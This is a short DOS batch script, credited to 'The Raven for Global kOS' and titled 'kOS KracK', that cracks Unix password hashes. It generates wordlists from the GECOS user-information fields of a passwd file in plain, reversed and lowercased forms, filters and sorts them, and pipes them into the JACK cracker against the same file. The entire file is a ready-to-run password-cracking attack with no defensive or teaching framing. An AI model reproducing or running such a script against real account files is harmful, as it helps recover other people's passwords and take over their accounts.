@ECHO OFF
CLS
ECHO kOS KracK
REM Made by The Raven for Global kOS
ECHO KracKing passwd with GECOS
JPP -Gecos:3 -MInlength:6 -MAxlength:8 passwd | GREP -v [0-9] | JSORT | JPP -Include | JACK -Pwfile:passwd -STdin %1
ECHO KracKing passwd with Reversed GECOS
JPP -Gecos:3 -REVerse -MInlength:6 -MAxlength:8 passwd | GREP -v [0-9] | JSORT | JPP -Include | JACK -Pwfile:passwd -STdin %1
ECHO KracKing passwd with Lowercased GECOS
JPP -Gecos:3 -LOWErcase -MInlength:6 -MAxlength:8 passwd | GREP -v [0-9] | JSORT | JPP -Include | JACK -Pwfile:passwd -STdin %1
